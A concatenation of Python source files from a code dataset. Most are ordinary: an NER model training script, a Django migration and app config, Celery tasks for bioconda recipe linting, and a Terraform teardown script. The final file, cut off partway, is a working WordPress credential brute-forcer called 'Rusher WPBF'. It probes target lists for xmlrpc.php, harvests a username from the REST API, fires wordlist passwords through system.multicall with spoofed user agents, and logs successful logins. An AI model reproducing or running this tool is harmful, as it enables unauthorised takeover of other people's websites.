# print(word, ctc_pred)
ctc_pred_dict[word]=ctc_pred
return ctc_pred_dict
def prepare_train_set_dev_data():
lower = parameters['lower']
zeros = parameters['zeros']
tag_scheme = parameters['tag_scheme']
#------------------------------------------------------------------
#------------- create the frequency vector-------------------------
#------------------------------------------------------------------
if parameters['use_freq_vector']:
create_frequecny_vector()
# print("completed frequency vector creation")
#------------------------------------------------------------------
#------------- create the ctc_dict-------------------------
#------------------------------------------------------------------
ctc_pred_dict = read_ctc_pred_file()
print("completed ctc predictions reading ")
#------------------------------------------------------------------
#------------- prepare the training data --------------------------
#------------- merge labels and select category specific entities -
#------------------------------------------------------------------
input_train_file=utils.Merge_Label(parameters["train"])
Sort_Entity_by_Count(input_train_file,parameters["sorted_entity_list_file_name"])
with open(parameters["sorted_entity_list_file_name"]) as f:
sorted_entity_list = json.load(f)
set_of_selected_tags=[]
entity_category_code=parameters["entity_category_code"]
entity_category_human_language=parameters["entity_category_human_language"]
set_of_selected_tags.extend(sorted_entity_list[0:-6])
if parameters['entity_category']=='code':
for entity in entity_category_human_language:
if entity in entity_category_human_language and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if parameters['entity_category']=='human_lang':
for entity in entity_category_code:
if entity in entity_category_code and entity in set_of_selected_tags:
set_of_selected_tags.remove(entity)
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
if parameters['entity_category']=='all':
if 'Algorithm' not in set_of_selected_tags:
set_of_selected_tags.append('Algorithm')
print("set of entities: ", set_of_selected_tags)
merge_tags=parameters['merge_tags']
train_sentences = loader.load_sentences_so_w_pred(parameters["train"], parameters["train_pred"], lower, zeros,merge_tags, set_of_selected_tags)
if parameters["mode"]=="dev":
dev_sentences = loader.load_sentences_so_w_pred(parameters["dev"], parameters["dev_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
elif parameters["mode"]=="test":
dev_sentences = loader.load_sentences_so_w_pred(parameters["test"], parameters["test_pred"],lower, zeros,merge_tags, set_of_selected_tags)
test_sentences = dev_sentences
# test_sentences = loader.load_sentences_so(parameters["test"], lower, zeros,merge_tags, set_of_selected_tags)
loader.update_tag_scheme(train_sentences, tag_scheme)
loader.update_tag_scheme(dev_sentences, tag_scheme)
loader.update_tag_scheme(test_sentences, tag_scheme)
dico_words_train = loader.word_mapping(train_sentences, lower)[0]
dico_chars, char_to_id, id_to_char = loader.char_mapping(train_sentences)
dico_tags, tag_to_id, id_to_tag = loader.tag_mapping(train_sentences)
# print(tag_to_id)
#------------------------------------------------------------------------------------------------------------
#------------- based on parameters setting(should be set by command line argutments) ------------------------
#------------- load pretrained word embeddings --------------------------------------------------------------
#------------------------------------------------------------------------------------------------------------
if parameters['all_emb']:
all_dev_test_words=[w[0][0] for w in dev_sentences+test_sentences]
else:
all_dev_test_words = []
if parameters['use_pre_emb']:
dico_words, word_to_id, id_to_word = loader.augment_with_pretrained(
dico_words_train.copy(),
parameters['pre_emb'],
all_dev_test_words
)
else:
dico_words = dico_words_train
word_to_id, id_to_word = loader.create_mapping(dico_words_train.copy())
train_data = loader.prepare_dataset(train_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
dev_data = loader.prepare_dataset(dev_sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower)
test_data = loader.prepare_dataset(test_sentences, word_to_id, char_to_id, tag_to_id,ctc_pred_dict, lower)
all_freq_embed={}
for line in open(parameters['freq_vector_file']):
# print(line)
s = line.strip().split()
if len(s) == parameters['freq_dim'] + 1:
all_freq_embed[s[0]] = np.array([float(i) for i in s[1:]])
else:
print("freq dim mismatch: ","required: ", parameters['freq_dim'], "given: ",len(s)-1)
# print(all_freq_embed)
freq_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['freq_dim']))
for w in word_to_id:
if w in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w]
elif w.lower() in all_freq_embed:
freq_embeds[word_to_id[w]] = all_freq_embed[w.lower()]
# print("done loading freq embeds")
all_word_embeds = {}
if parameters['use_pre_emb']:
for i, line in enumerate(codecs.open(parameters['pre_emb'] , 'r', 'utf-8')):
# print(line)
s = line.strip().split()
if len(s) == parameters['word_dim'] + 1:
all_word_embeds[s[0]] = np.array([float(i) for i in s[1:]])
word_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word_to_id), parameters['word_dim']))
seg_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['segmentation_count'] , parameters['segmentation_dim']))
ctc_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_recognizer_count'], parameters['code_recognizer_dim']))
# code_pred_embeds = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (parameters['code_pred_count'], parameters['code_pred_dim']))
if parameters['use_pre_emb']:
for w in word_to_id:
if w in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w]
elif w.lower() in all_word_embeds:
word_embeds[word_to_id[w]] = all_word_embeds[w.lower()]
# print('Loaded %i pretrained embeddings.' % len(all_word_embeds))
# print('Loaded %i pretrained freq embeddings.' % len(all_freq_embed))
# freq_combined_word_vec=np.hstack((word_embeds,freq_embeds))
# word_embeds=freq_combined_word_vec
# mapping_file = parameters["models_path"]+'/mapping.pkl'
# with open(mapping_file, 'wb') as f:
# mappings = {
# 'word_to_id': word_to_id,
# 'id_to_word': id_to_word,
# 'tag_to_id': tag_to_id,
# 'char_to_id': char_to_id,
# 'id_to_char': id_to_char,
# 'parameters': parameters,
# 'word_embeds': word_embeds,
# 'freq_embeds': freq_embeds,
# 'seg_pred_embeds': ctc_pred_embeds
# }
# pickle.dump(mappings, f, protocol=4)
return train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds
# vis = visdom.Visdom() #JT: no need of visualization for now
# sys.stdout.flush()
def evaluating(model, datas, best_F, epoch_count, phase_name):
fout_per_epoch = open(parameters["perf_per_epoch_file"],'a')
print("-----------------------------------")
print("now evaluating: ",phase_name)
print("-----------------------------------")
prediction = []
save = False
new_F = 0.0
confusion_matrix = torch.zeros((len(tag_to_id) - 2, len(tag_to_id) - 2))
iter_count=0
for data in datas:
ground_truth_id = data['tags']
words = data['str_words']
chars2 = data['chars']
caps = data['caps']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
dwords = Variable(torch.LongTensor(data['words']))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
dcaps = Variable(torch.LongTensor(caps))
if use_gpu:
val, out = model(words, dwords.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), chars2_mask.cuda(), dcaps.cuda(), chars2_length, d)
else:
val, out = model(words, dwords, sentence_seg_preds, sentence_ctc_preds, chars2_mask, dcaps, chars2_length, d)
predicted_id = out
for (word, true_id, pred_id) in zip(words, ground_truth_id, predicted_id):
line = ' '.join([word, id_to_tag[true_id], id_to_tag[pred_id]])
prediction.append(line)
confusion_matrix[true_id, pred_id] += 1
prediction.append('')
predf = parameters["eval_temp"] + '/pred.' + phase_name +"_"+str(epoch_count)
scoref = parameters["eval_temp"] + '/score.' + phase_name+"_"+str(epoch_count)
with open(predf, 'w') as f:
f.write('\n'.join(prediction))
eval_result = conlleval_py.evaluate_conll_file(inputFile=predf)
os.system('%s < %s > %s' % (eval_script, predf, scoref))
eval_lines = [l.rstrip() for l in codecs.open(scoref, 'r', 'utf8')]
for i, line in enumerate(eval_lines):
print(line)
if i == 1:
new_F = float(line.strip().split()[-1])
if new_F > best_F:
best_F = new_F
save = True
print('the best F is ', new_F)
#-------------------------------------------------------------------------------------------------
#--------------- only print the performnace on dev/test set. do not print for train set ----------
#-------------------------------------------------------------------------------------------------
if phase_name=="dev" or phase_name=="test":
print_result.print_result(eval_result, epoch_count, parameters["sorted_entity_list_file_name"], parameters["entity_category_code"], parameters["entity_category_human_language"])
print("-----------------------------------")
over_all_p=eval_result['overall']['P']
over_all_r=eval_result['overall']['R']
over_all_f1=eval_result['overall']['F1']
op_line = phase_name+ ": epoch: "+str(epoch_count) +" P: "+ str(over_all_p)+" R: "+str(over_all_r)+" F1: "+str(over_all_f1)+"\n"
fout_per_epoch.write(op_line)
fout_per_epoch.flush()
return best_F, new_F, save
def train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data):
char_embed_dict = {}
losses = []
loss = 0.0
best_dev_F = -1.0
best_test_F = -1.0
best_train_F = -1.0
all_F = [[0, 0, 0]]
plot_every = 10
eval_every = 20
count = 0
model.train(True)
start = time.time()
for epoch in range(1, parameters["epochs"]+1):
print("---------epoch count: ", epoch)
for i, index in enumerate(np.random.permutation(len(train_data))):
tr = time.time()
count += 1
data = train_data[index]
# print("from train_so: ",data)
#what is the data instance looks like"
#'str_words': ['Trial', 'and', 'error', 'seems', 'a', 'very', 'dumb', '(', 'and', 'annoying', ')', 'approach', 'to', 'solve', 'this', 'problem', '.'],
#'words': [1, 9, 76, 179, 7, 215, 1, 26, 9, 1, 29, 332, 4, 310, 15, 64, 3],
#'markdown': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'chars': [[26, 8, 5, 4, 10], [4, 6, 11], [1, 8, 8, 3, 8], [7, 1, 1, 14, 7], [4], [22, 1, 8, 17], [11, 13, 14, 21], [35], [4, 6, 11], [4, 6, 6, 3, 17, 5, 6, 16], [34], [4, 15, 15, 8, 3, 4, 12, 9], [2, 3], [7, 3, 10, 22, 1], [2, 9, 5, 7], [15, 8, 3, 21, 10, 1, 14], [20]],
#'caps': [2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
#'tags': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 'handcrafted': [28052, 28053, 28054, 28055, 28056, 28057, 28058, 28059, 28060, 28061, 28062, 28063, 28064, 28065, 28066, 28067, 28068]
model.zero_grad()
sentence_in = data['words']
sentence_tokens=data['str_words']
sentence_seg_preds = data['seg_pred']
sentence_ctc_preds = data['ctc_pred']
tags = data['tags']
chars2 = data['chars']
# print(data)
sentence_in = Variable(torch.LongTensor(sentence_in))
sentence_seg_preds = Variable(torch.LongTensor(sentence_seg_preds))
sentence_ctc_preds = Variable(torch.LongTensor(sentence_ctc_preds))
######### char lstm
if parameters['char_mode'] == 'LSTM':
chars2_sorted = sorted(chars2, key=lambda p: len(p), reverse=True)
d = {}
for i, ci in enumerate(chars2):
for j, cj in enumerate(chars2_sorted):
if ci == cj and not j in d and not i in d.values():
d[j] = i
continue
chars2_length = [len(c) for c in chars2_sorted]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_sorted), char_maxl), dtype='int')
for i, c in enumerate(chars2_sorted):
chars2_mask[i, :chars2_length[i]] = c
chars2_mask = Variable(torch.LongTensor(chars2_mask))
# ######## char cnn
if parameters['char_mode'] == 'CNN':
d = {}
chars2_length = [len(c) for c in chars2]
char_maxl = max(chars2_length)
chars2_mask = np.zeros((len(chars2_length), char_maxl), dtype='int')
for i, c in enumerate(chars2):
chars2_mask[i, :chars2_length[i]] = c
# print(chars2_mask)
chars2_mask = Variable(torch.LongTensor(chars2_mask))
targets = torch.LongTensor(tags)
caps = Variable(torch.LongTensor(data['caps']))
if use_gpu:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens, sentence_in.cuda(), sentence_seg_preds.cuda(),sentence_ctc_preds.cuda(), targets.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d)
else:
neg_log_likelihood = model.neg_log_likelihood(sentence_tokens,sentence_in,sentence_seg_preds,sentence_ctc_preds, targets, chars2_mask, caps, chars2_length, d)
# loss += neg_log_likelihood.data[0] / len(data['words'])
#JT : added the following to save char embed (for evaluating char embeds)
# if use_gpu:
# char_embed_op = model.get_char_embedding(sentence_in.cuda(), chars2_mask.cuda(), caps.cuda(), chars2_length, d).clone().data.cpu().numpy()
# else:
# char_embed_op = model.get_char_embedding(sentence_in, chars2_mask, caps, chars2_length, d).clone().data.cpu().numpy()
# char_embed_dict = save_char_embed( data['str_words'], char_embed_dict, char_embed_op)
# char_embed_dict_name= "char_embed_dict_"+str(epoch)+".json"
# with open(char_embed_dict_name, 'wb') as fp:
# pickle.dump(char_embed_dict, fp)
# print(char_embed_op)
loss += neg_log_likelihood.data.item() / len(data['words']) #JT : data[0]> data.item()
neg_log_likelihood.backward()
# torch.nn.utils.clip_grad_norm(model.parameters(), 5.0)
torch.nn.utils.clip_grad_norm_(model.parameters(), 5.0) #JT : clip_grad_norm > clip_grad_norm_
optimizer.step()
if count % len(train_data) == 0:
utils.adjust_learning_rate(optimizer, lr=learning_rate/(1+0.05*count/len(train_data)))
#JT: evaluate after 1 epoch
model.train(False)
best_train_F, new_train_F, _ = evaluating(model, train_data, best_train_F, epoch, "train")
if parameters["mode"]=="dev":
phase_name="dev"
else:
phase_name="test"
best_dev_F, new_dev_F, save = evaluating(model, dev_data, best_dev_F, epoch, phase_name)
if save:
torch.save(model, model_name)
best_test_F, new_test_F = 0, 0
all_F.append([new_train_F, new_dev_F, new_test_F])
step_lr_scheduler.step()
# word_embeding_weights=model.word_embeds.weight.data.cpu().numpy()
# print("type(word_embeding_weights): ", type(word_embeding_weights))
# print("shape word_embeding_weights: ", word_embeding_weights.shape)
# print("shape word_embeding_weights: ", model.word_embeds.weight.data.size())
# print("shape word_embeding_weights: ", model.word_embeds.weight.data[0])
#-------------------------------------------------------------------------------------------------
#--------------------- save model for each epoch, after finding the optimal epoch ----------------
#--------------------- save model from last epoch only -------------------------------------------
#-------------------------------------------------------------------------------------------------
PATH=parameters["models_path"]+"/model_epoch."+str(epoch)
torch.save(model, PATH)
model.train(True)
end = time.time()
time_in_this_epoch = end - start
print("time in this epoch: ", time_in_this_epoch, "secs")
start=end
return char_embed_dict
if __name__ == '__main__':
eval_script= parameters["eval_script"]
eval_temp= parameters["eval_temp"]
try:
shutil.rmtree(eval_temp)
except Exception as e:
pass
fout_per_epoch = open(parameters["perf_per_epoch_file"],'w')
fout_per_epoch.close()
if not os.path.isfile(eval_script):
raise Exception('CoNLL evaluation script not found at "%s"' % eval_script)
if not os.path.exists(eval_temp):
os.makedirs(eval_temp)
if not os.path.exists(parameters["models_path"]):
os.makedirs(parameters["models_path"])
train_data, dev_data, test_data, word_to_id, id_to_word, tag_to_id, id_to_tag, char_to_id, id_to_char, word_embeds, freq_embeds, seg_pred_embeds, ctc_pred_embeds =prepare_train_set_dev_data()
use_gpu = parameters['use_gpu']
gpu_id = parameters["gpu_id"]
name = parameters['name']
model_name = parameters["models_path"] + name #get_name(parameters)
tmp_model = model_name + '.tmp'
model = BiLSTM_CRF(vocab_size=len(word_to_id),
tag_to_ix=tag_to_id,
embedding_dim=parameters['word_dim'],
freq_embed_dim=parameters['freq_dim'],
markdown_embed_dim=parameters['markdown_dim'],
seg_pred_embed_dim=parameters['segmentation_dim'],
hidden_dim=parameters['word_lstm_dim'],
use_gpu=use_gpu,
char_to_ix=char_to_id,
pre_word_embeds=word_embeds,
word_freq_embeds=freq_embeds,
word_seg_pred_embeds=seg_pred_embeds,
word_ctc_pred_embeds=ctc_pred_embeds,
use_crf=parameters['crf'],
char_mode=parameters['char_mode'],
# n_cap=4,
# cap_embedding_dim=10
)
if parameters['reload']:
model.load_state_dict(torch.load(model_name))
if use_gpu:
GPU_id=gpu_id
print("GPU ID = ", GPU_id)
torch.cuda.set_device(GPU_id)
model.cuda()
learning_rate = parameters["LR"]
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9)
step_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.8)
t = time.time()
train_model(model, step_lr_scheduler, optimizer, train_data, dev_data, test_data)
print("total time in training: ",time.time() - t)
try:
os.remove(parameters["sorted_entity_list_file_name"])
except Exception as e:
pass
| StarcoderdataPython |
1688013 | # Generated by Django 2.1.5 on 2019-02-10 12:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quiz', '0002_auto_20190210_1144'),
]
operations = [
migrations.AddField(
model_name='game',
name='game_type',
field=models.PositiveIntegerField(default=0),
),
]
| StarcoderdataPython |
3333698 | """
Celery Tasks
"""
import logging
import os
import time
from collections import namedtuple
from typing import TYPE_CHECKING
from .worker import celery
from .config import BOT_NAME, BOT_EMAIL
from .. import utils
from ..recipe import Recipe
from ..githandler import TempGitHandler
from ..githubhandler import CheckRunStatus, CheckRunConclusion
if TYPE_CHECKING:
from .worker import AsyncTask
from typing import Dict
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
PRInfo = namedtuple('PRInfo', 'installation user repo ref recipes issue_number')
class Checkout:
# We can't use contextlib.contextmanager because these are async and
# asyncontextmanager is only available in Python >3.7
"""Async context manager checking out git repo
Args:
ref: optional sha checksum to checkout (only if issue_number not given)
issue_number: optional issue number to checkout (only of ref not given)
Returns `None` if the checkout failed, otherwise the TempGitHandler object
>>> with Checkout(ghapi, issue_number) as git:
>>> if git is None:
>>> print("checkout failed")
>>> else:
>>> for filename in git.list_changed_files():
"""
def __init__(self, ghapi, ref=None, issue_number=None):
self.ghapi = ghapi
self.orig_cwd = None
self.git = None
self.ref = ref
self.issue_number = issue_number
async def __aenter__(self):
try:
if self.issue_number:
prs = await self.ghapi.get_prs(number=self.issue_number)
fork_user = prs['head']['user']['login']
fork_repo = prs['head']['repo']['name']
branch_name = prs['head']['ref']
ref = None
else:
fork_user = None
fork_repo = None
branch_name = "unknown"
ref = self.ref
self.git = TempGitHandler(
password=self.ghapi.token,
home_user=self.ghapi.user,
home_repo=self.ghapi.repo,
fork_user=fork_user,
fork_repo=fork_repo
)
self.git.set_user(BOT_NAME, BOT_EMAIL)
self.orig_cwd = os.getcwd()
os.chdir(self.git.tempdir.name)
branch = self.git.create_local_branch(branch_name, ref)
if not branch:
raise RuntimeError(f"Failed to checkout branch {branch_name} from {self.git}")
branch.checkout()
return self.git
except Exception as exc:
logger.exception(f"Error while checking out with {self.ghapi}")
return None
async def __aexit__(self, _exc_type, _exc, _tb):
if self.orig_cwd:
os.chdir(self.orig_cwd)
if self.git:
self.git.close()
@celery.task(acks_late=True, ignore_result=False)
async def get_latest_pr_commit(issue_number: int, ghapi):
"""Returns last commit"""
commit = {'sha': None}
async for commit in await ghapi.iter_pr_commits(issue_number):
pass
return commit['sha']
@celery.task(acks_late=True)
async def create_check_run(head_sha: str, ghapi):
logger.error("create_check_run: %s %s", head_sha, ghapi)
check_run_number = await ghapi.create_check_run("Linting Recipe(s)", head_sha)
logger.warning("Created check run %s", check_run_number)
@celery.task(acks_late=True)
async def bump(issue_number: int, ghapi):
"""Bump the build number in each recipe"""
logger.info("Processing bump command: %s", issue_number)
async with Checkout(ghapi, issue_number=issue_number) as git:
if not git:
logger.error("Failed to checkout")
return
recipes = git.get_changed_recipes()
for meta_fn in recipes:
recipe = Recipe.from_file('recipes', meta_fn)
buildno = int(recipe.meta['build']['number']) + 1
recipe.reset_buildnumber(buildno)
recipe.save()
msg = f"Bump {recipe} buildno to {buildno}"
if not git.commit_and_push_changes(recipes, None, msg, sign=True):
logger.error("Failed to push?!")
@celery.task(acks_late=True)
async def lint_check(check_run_number: int, ref: str, ghapi):
"""Execute linter
"""
ref_label = ref[:8] if len(ref) >= 40 else ref
logger.info("Starting lint check for %s", ref_label)
await ghapi.modify_check_run(check_run_number, status=CheckRunStatus.in_progress)
async with Checkout(ghapi, ref=ref) as git:
if not git:
await ghapi.modify_check_run(
check_run_number,
status=CheckRunStatus.completed,
conclusion=CheckRunConclusion.cancelled,
output_title=
f"Failed to check out "
f"{ghapi.user}/{ghapi.repo}:{ref_label}"
)
return
recipes = git.get_changed_recipes()
if not recipes:
await ghapi.modify_check_run(
check_run_number,
status=CheckRunStatus.completed,
conclusion=CheckRunConclusion.neutral,
output_title="No recipes modified",
output_summary=
"This branch does not modify any recipes! "
"Please make sure this is what you intend. Upon merge, "
"no packages would be built."
)
return
utils.load_config('config.yml')
from bioconda_utils.linting import lint as _lint, LintArgs, markdown_report
df = _lint(recipes, LintArgs())
annotations = []
if df is None:
conclusion = CheckRunConclusion.success
title = "All recipes in good condition"
summary = "No problems found"
else:
conclusion = CheckRunConclusion.failure
title = "Some recipes had problems"
summary = "Please fix the listed issues"
for _, row in df.iterrows():
check = row['check']
info = row['info']
recipe = row['recipe']
annotations.append({
'path': recipe + '/meta.yaml',
'start_line': info.get('start_line', 1),
'end_line': info.get('end_line', 1),
'annotation_level': 'failure',
'title': check,
'message': info['fix']
})
await ghapi.modify_check_run(
check_run_number,
status=CheckRunStatus.completed,
conclusion=conclusion,
output_title=title,
output_summary=summary,
output_text=markdown_report(df),
output_annotations=annotations)
@celery.task(acks_late=True)
def sleep(seconds, msg):
"""Demo task that just sleeps for a given number of seconds"""
logger.info("Sleeping for %i seconds: %s", seconds, msg)
for second in range(seconds):
time.sleep(1)
logger.info("Slept for %i seconds: %s", second, msg)
logger.info("Waking: %s", msg)
| StarcoderdataPython |
1721553 | #!/usr/bin/env python3
"""
# Copyright (c) 2018, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Author: <NAME> <EMAIL>
Usage:
git
python destroy.py
"""
import argparse
import logging
from python_terraform import Terraform
logger = logging.getLogger()
handler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)-8s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
def main(username, password):
username = username
password = password
WebInDeploy_vars = {
'Admin_Username': username,
'Admin_Password': password
}
WebInBootstrap_vars = {
'Admin_Username': username,
'Admin_Password': password
}
albDns = ''
nlbDns = ''
fwMgt = ''
# Set run_plan to TRUE is you wish to run terraform plan before apply
run_plan = False
deployment_status = {}
kwargs = {"auto-approve": True}
#
# Destroy Infrastructure
#
tf = Terraform(working_dir='./WebInDeploy')
rg_name = tf.output('RG_Name')
attack_rg_name = tf.output('Attacker_RG_Name')
logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
WebInDeploy_vars.update({'RG_Name': rg_name})
WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
if run_plan:
print('Calling tf.plan')
tf.plan(capture_output=False)
return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
# return_code1 =0
print('Got return code {}'.format(return_code1))
if return_code1 != 0:
logger.info("Failed to destroy build ")
exit()
else:
logger.info("Destroyed WebInDeploy ")
WebInBootstrap_vars.update({'RG_Name': rg_name})
WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
tf = Terraform(working_dir='./WebInBootstrap')
if run_plan:
print('Calling tf.plan')
tf.plan(capture_output=False)
return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
# return_code1 =0
print('Got return code {}'.format(return_code1))
if return_code1 != 0:
logger.info("WebInBootstrap destroyed")
deployment_status = {'WebInDeploy': 'Fail'}
exit()
else:
deployment_status = {'WebInDeploy': 'Success'}
exit()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Get Terraform Params')
parser.add_argument('-u', '--username', help='Firewall Username', required=True)
parser.add_argument('-p', '--password', help='Firewall Password', required=True)
args = parser.parse_args()
username = args.username
password = args.password
main(username, password)
| StarcoderdataPython |
3287549 | <filename>rest_framework_jet/apps.py
from django.apps import AppConfig
class RestFrameworkJetConfig(AppConfig):
name = 'rest_framework_jet'
| StarcoderdataPython |
138675 | print("""
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$$ /$$$$$$$$
| $$__ $$ | $$ /$ | $$| $$__ $$| $$__ $$| $$_____/
| $$ \ $$ | $$ /$$$| $$| $$ \ $$| $$ \ $$| $$
| $$$$$$$/ /$$$$$$| $$/$$ $$ $$| $$$$$$$/| $$$$$$$ | $$$$$
| $$__ $$|______/| $$$$_ $$$$| $$____/ | $$__ $$| $$__/
| $$ \ $$ | $$$/ \ $$$| $$ | $$ \ $$| $$
| $$ | $$ | $$/ \ $$| $$ | $$$$$$$/| $$
|__/ |__/ |__/ \__/|__/ |_______/ |__/
=============================================================
[*] [Rusher WPBF - XMLRPC.php] | [R&D ICWR - Afrizal F.A]
=============================================================
""")
import os, sys, random, requests, concurrent.futures
from argparse import ArgumentParser
class rusher_wpbf:
def count_percent(self):
self.percent = self.done_process / self.total_process * 100
def useragent(self):
arr = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16", "Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"]
return arr[random.randint(0, len(arr)-1)]
def check_xmlrpc(self, target):
try:
xmldata = '<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data></data></array></value></param></params></methodCall>'
x = requests.post(url="{}/xmlrpc.php".format(target), data=xmldata, headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, timeout=self.args.timeout)
if '<methodResponse>' in x.text:
return True
else:
return False
except:
return False
def get_user(self, target):
try:
x = requests.get(url="{}/wp-json/wp/v2/users/1".format(target), headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, timeout=self.args.timeout)
return x.json()['name']
except:
return "admin"
def req(self, target, user, passwd):
try:
xml = """<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>{}</string></value><value><string>{}</string></value></data></array></value></data></array></value></member></struct></value></data></array></value></param></params></methodCall>""".format(user, passwd)
x = requests.post(url="{}/xmlrpc.php".format(target), headers={ "User-Agent": self.useragent(), "Content-Type": "application/xml" }, data=xml, timeout=self.args.timeout)
if "<name>isAdmin</name>" in x.text:
open("result-wp/success.txt", "a").write("{}|{}|{}\n".format(target, user, passwd))
self.result += 1
self.done_process += 1
self.count_percent()
except:
if self.try_login < 3:
self.try_login += 1
self.req(target, user, passwd)
elif self.try_login > 3:
self.try_login = 0
self.done_process += 1
self.count_percent()
sys.stdout.write("\r[*] [Proccess] [{}/{} | {}%] [Result: {}/{}]".format(self.done_process, self.total_process, round(self.percent), self.result, self.target))
sys.stdout.flush()
def execution(self, target, thread):
if self.check_xmlrpc(target):
user = self.get_user(target)
self.total_process += len(open(self.args.wordlist).read().splitlines())
with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor:
for x in open(self.args.wordlist).read().splitlines():
executor.submit(self.req, target, user, x)
else:
pass
def __init__(self):
if not os.path.isdir("result-wp"):
os.mkdir("result-wp")
self.done_process = 0
self.try_login = 0
self.total_process = 0
self.result = 0
parser = ArgumentParser()
parser.add_argument("-x", "--target", required=True)
parser.add_argument("-w", "--wordlist", required=True)
parser.add_argument("-t", "--thread", required=True, type=int)
parser.add_argument("-d", "--timeout", required=True, type=int)
self.args = parser.parse_args()
print("[*] [Thread: {}]".format(self.args.thread))
print("[*] [Timeout: {}]".format(self.args.timeout))
if os.path.isfile(self.args.target):
if os.path.isfile(self.args.wordlist):
print("[*] [Bruteforcing]")
self.target = len(open(self.args.target).read().splitlines())
with concurrent.futures.ThreadPoolExecutor(max_workers=self.args.thread) as executor:
for target in open(self.args.target).read().splitlines():
